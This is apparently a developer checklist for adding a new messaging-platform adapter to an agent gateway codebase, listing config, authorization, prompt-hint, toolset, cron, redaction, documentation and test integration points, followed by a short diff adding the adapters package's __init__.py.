Use this as a reference when building a new adapter — every item here is a
real integration point that exists in the codebase. Missing any of them will
cause broken functionality, missing features, or inconsistent behavior.
---
## 1. Core Adapter (`gateway/platforms/<platform>.py`)
The adapter is a subclass of `BasePlatformAdapter` from `gateway/platforms/base.py`.
### Required methods
| Method | Purpose |
|--------|---------|
| `__init__(self, config)` | Parse config, init state. Call `super().__init__(config, Platform.YOUR_PLATFORM)` |
| `connect() -> bool` | Connect to the platform, start listeners. Return True on success |
| `disconnect()` | Stop listeners, close connections, cancel tasks |
| `send(chat_id, text, ...) -> SendResult` | Send a text message |
| `send_typing(chat_id)` | Send typing indicator |
| `send_image(chat_id, image_url, caption) -> SendResult` | Send an image |
| `get_chat_info(chat_id) -> dict` | Return `{name, type, chat_id}` for a chat |
### Optional methods (have default stubs in base)
| Method | Purpose |
|--------|---------|
| `send_document(chat_id, path, caption)` | Send a file attachment |
| `send_voice(chat_id, path)` | Send a voice message |
| `send_video(chat_id, path, caption)` | Send a video |
| `send_animation(chat_id, path, caption)` | Send a GIF/animation |
| `send_image_file(chat_id, path, caption)` | Send image from local file |
### Required function
```python
def check_<platform>_requirements() -> bool:
"""Check if this platform's dependencies are available."""
```
### Key patterns to follow
- Use `self.build_source(...)` to construct `SessionSource` objects
- Call `self.handle_message(event)` to dispatch inbound messages to the gateway
- Use `MessageEvent`, `MessageType`, `SendResult` from base
- Use `cache_image_from_bytes`, `cache_audio_from_bytes`, `cache_document_from_bytes` for attachments
- Filter self-messages (prevent reply loops)
- Filter sync/echo messages if the platform has them
- Redact sensitive identifiers (phone numbers, tokens) in all log output
- Implement reconnection with exponential backoff + jitter for streaming connections
- Set `MAX_MESSAGE_LENGTH` if the platform has message size limits
---
## 2. Platform Enum (`gateway/config.py`)
Add the platform to the `Platform` enum:
```python
class Platform(Enum):
...
YOUR_PLATFORM = "your_platform"
```
Add env var loading in `_apply_env_overrides()`:
```python
# Your Platform
your_token = os.getenv("YOUR_PLATFORM_TOKEN")
if your_token:
if Platform.YOUR_PLATFORM not in config.platforms:
config.platforms[Platform.YOUR_PLATFORM] = PlatformConfig()
config.platforms[Platform.YOUR_PLATFORM].enabled = True
config.platforms[Platform.YOUR_PLATFORM].token = your_token
```
Update `get_connected_platforms()` if your platform doesn't use token/api_key
(e.g., WhatsApp uses `enabled` flag, Signal uses `extra` dict).
---
## 3. Adapter Factory (`gateway/run.py`)
Add to `_create_adapter()`:
```python
elif platform == Platform.YOUR_PLATFORM:
from gateway.platforms.your_platform import YourAdapter, check_your_requirements
if not check_your_requirements():
logger.warning("Your Platform: dependencies not met")
return None
return YourAdapter(config)
```
---
## 4. Authorization Maps (`gateway/run.py`)
Add to BOTH dicts in `_is_user_authorized()`:
```python
platform_env_map = {
...
Platform.YOUR_PLATFORM: "YOUR_PLATFORM_ALLOWED_USERS",
}
platform_allow_all_map = {
...
Platform.YOUR_PLATFORM: "YOUR_PLATFORM_ALLOW_ALL_USERS",
}
```
---
## 5. Session Source (`gateway/session.py`)
If your platform needs extra identity fields (e.g., Signal's UUID alongside
phone number), add them to the `SessionSource` dataclass with `Optional` defaults,
and update `to_dict()`, `from_dict()`, and `build_source()` in base.py.
---
## 6. System Prompt Hints (`agent/prompt_builder.py`)
Add a `PLATFORM_HINTS` entry so the agent knows what platform it's on:
```python
PLATFORM_HINTS = {
...
"your_platform": (
"You are on Your Platform. "
"Describe formatting capabilities, media support, etc."
),
}
```
Without this, the agent won't know it's on your platform and may use
inappropriate formatting (e.g., markdown on platforms that don't render it).
---
## 7. Toolset (`toolsets.py`)
Add a named toolset for your platform:
```python
"hermes-your-platform": {
"description": "Your Platform bot toolset",
"tools": _HERMES_CORE_TOOLS,
"includes": []
},
```
And add it to the `hermes-gateway` composite:
```python
"hermes-gateway": {
"includes": [..., "hermes-your-platform"]
}
```
---
## 8. Cron Delivery (`cron/scheduler.py`)
Add to `platform_map` in `_deliver_result()`:
```python
platform_map = {
...
"your_platform": Platform.YOUR_PLATFORM,
}
```
Without this, `schedule_cronjob(deliver="your_platform")` silently fails.
---
## 9. Send Message Tool (`tools/send_message_tool.py`)
Add to `platform_map` in `send_message_tool()`:
```python
platform_map = {
...
"your_platform": Platform.YOUR_PLATFORM,
}
```
Add routing in `_send_to_platform()`:
```python
elif platform == Platform.YOUR_PLATFORM:
return await _send_your_platform(pconfig, chat_id, message)
```
Implement `_send_your_platform()` — a standalone async function that sends
a single message without requiring the full adapter (for use by cron jobs
and the send_message tool outside the gateway process).
Update the tool schema `target` description to include your platform example.
---
## 10. Cronjob Tool Schema (`tools/cronjob_tools.py`)
Update the `deliver` parameter description and docstring to mention your
platform as a delivery option.
---
## 11. Channel Directory (`gateway/channel_directory.py`)
If your platform can't enumerate chats (most can't), add it to the
session-based discovery list:
```python
for plat_name in ("telegram", "whatsapp", "signal", "your_platform"):
```
---
## 12. Status Display (`hermes_cli/status.py`)
Add to the `platforms` dict in the Messaging Platforms section:
```python
platforms = {
...
"Your Platform": ("YOUR_PLATFORM_TOKEN", "YOUR_PLATFORM_HOME_CHANNEL"),
}
```
---
## 13. Gateway Setup Wizard (`hermes_cli/gateway.py`)
Add to the `_PLATFORMS` list:
```python
{
"key": "your_platform",
"label": "Your Platform",
"emoji": "📱",
"token_var": "YOUR_PLATFORM_TOKEN",
"setup_instructions": [...],
"vars": [...],
}
```
If your platform needs custom setup logic (connectivity testing, QR codes,
policy choices), add a `_setup_your_platform()` function and route to it
in the platform selection switch.
Update `_platform_status()` if your platform's "configured" check differs
from the standard `bool(get_env_value(token_var))`.
---
## 14. Phone/ID Redaction (`agent/redact.py`)
If your platform uses sensitive identifiers (phone numbers, etc.), add a
regex pattern and redaction function to `agent/redact.py`. This ensures
identifiers are masked in ALL log output, not just your adapter's logs.
---
## 15. Documentation
| File | What to update |
|------|---------------|
| `README.md` | Platform list in feature table + documentation table |
| `AGENTS.md` | Gateway description + env var config section |
| `website/docs/user-guide/messaging/<platform>.md` | **NEW** — Full setup guide (see existing platform docs for template) |
| `website/docs/user-guide/messaging/index.md` | Architecture diagram, toolset table, security examples, Next Steps links |
| `website/docs/reference/environment-variables.md` | All env vars for the platform |
---
## 16. Tests (`tests/gateway/test_<platform>.py`)
Recommended test coverage:
- Platform enum exists with correct value
- Config loading from env vars via `_apply_env_overrides`
- Adapter init (config parsing, allowlist handling, default values)
- Helper functions (redaction, parsing, file type detection)
- Session source round-trip (to_dict → from_dict)
- Authorization integration (platform in allowlist maps)
- Send message tool routing (platform in platform_map)
Optional but valuable:
- Async tests for message handling flow (mock the platform API)
- SSE/WebSocket reconnection logic
- Attachment processing
- Group message filtering
---
## Quick Verification
After implementing everything, verify with:
```bash
# All tests pass
python -m pytest tests/ -q
# Grep for your platform name to find any missed integration points
grep -r "telegram\|discord\|whatsapp\|slack" gateway/ tools/ agent/ cron/ hermes_cli/ toolsets.py \
--include="*.py" -l | sort -u
# Check each file in the output — if it mentions other platforms but not yours, you missed it
```

View File

@@ -0,0 +1,17 @@
"""
Platform adapters for messaging integrations.
Each adapter handles:
- Receiving messages from a platform
- Sending messages/responses back
- Platform-specific authentication
- Message formatting and media handling
"""
from .base import BasePlatformAdapter, MessageEvent, SendResult
__all__ = [
"BasePlatformAdapter",
"MessageEvent",
"SendResult",
]

Some files were not shown because too many files have changed in this diff Show More